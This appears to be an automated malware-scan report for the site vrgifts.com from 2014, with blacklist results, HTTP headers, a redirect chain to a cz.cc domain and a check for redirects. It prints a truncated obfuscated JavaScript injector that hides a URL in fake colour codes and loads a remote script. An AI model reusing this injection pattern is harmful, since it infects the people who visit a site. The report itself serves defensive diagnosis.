Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vrgifts.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vrgifts.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://vrgifts.com/ | 200 OK Content-Length: 8032 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i+ document.write(div_pick_colors(div_colors,1)); } else { var new_cstyle=document.createElement("script"); new_cstyle.type="text/javascript"; new_cstyle.src=div_pick_colors(div_colors,0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); } } catch(e) { } try { check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); } Antivirus reports:
| ||
http://vrgifts.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 03 Oct 2014 00:29:53 GMT Location: http://fairbankhouston.cz.cc/ht_er_docs/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 224 Content-Type: text/html; charset=iso-8859-1 | clean |
http://fairbankhouston.cz.cc/ht_er_docs/ | HTTP/1.1 302 Found Connection: close Date: Fri, 03 Oct 2014 00:28:16 GMT Location: http://p.r.im Server: Apache/2.4.6 (Linux/SUSE) Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 | clean |
http://p.r.im/ | 200 OK Content-Length: 4122 Content-Type: text/html | clean |
http://p.r.im/js/ignition-current.min.js | 200 OK Content-Length: 145668 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) "object"!==typeof JSON&&(JSON={}); (function(){function e(f){return 10>f?"0"+f:f}function f(f){s.lastIndex=0;return s.test(f)?'"'+f.replace(s,function(f){var e=j[f];return"string"===typeof e?e:"\\u"+("0000"+f.charCodeAt(0).toString(16)).slice(-4)})+'"':'"'+f+'"'}function p(e,j){var l,B,q,s,Z=t,L,x=j[e];x&&("object"===typeof x&&"function"===typeof x.toJSON)&&(x=x.toJSON(e));"function"===typeof m&&(x=m.call(j,e,x));switch(typeof x){case "string":retur $.each(f,function(e,f){p(f)});e.empty()}})};window.IgnitionInstance=e;$("#lr-widget").each(function(){var f={};$(this).attr("rel")?f.site_id=$(this).attr("rel"):f.domain=window.location.hostname;$(this).attr("data-unlaunched")&&(f.useUnlaunchedInfo=!0);var j=new e($(this),f);j.initLive(function(){window.lrInitCallback&&window.lrInitCallback(j,this)});window.lrIgnition=j})})}(); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vrgifts.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 00:29:51 GMT
Accept-Ranges: bytes
ETag: "fd23fb-1f60-4a31467ccefc0"
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 8032
Content-Type: text/html
Last-Modified: Thu, 12 May 2011 13:45:43 GMT
...8032 bytes of data.
GET / HTTP/1.1
Host: vrgifts.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 00:29:51 GMT
Accept-Ranges: bytes
ETag: "fd23fb-1f60-4a31467ccefc0"
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 8032
Content-Type: text/html
Last-Modified: Thu, 12 May 2011 13:45:43 GMT
...8032 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vrgifts.com
Referer: http://www.google.com/search?q=vrgifts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vrgifts.com
Referer: http://www.google.com/search?q=vrgifts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.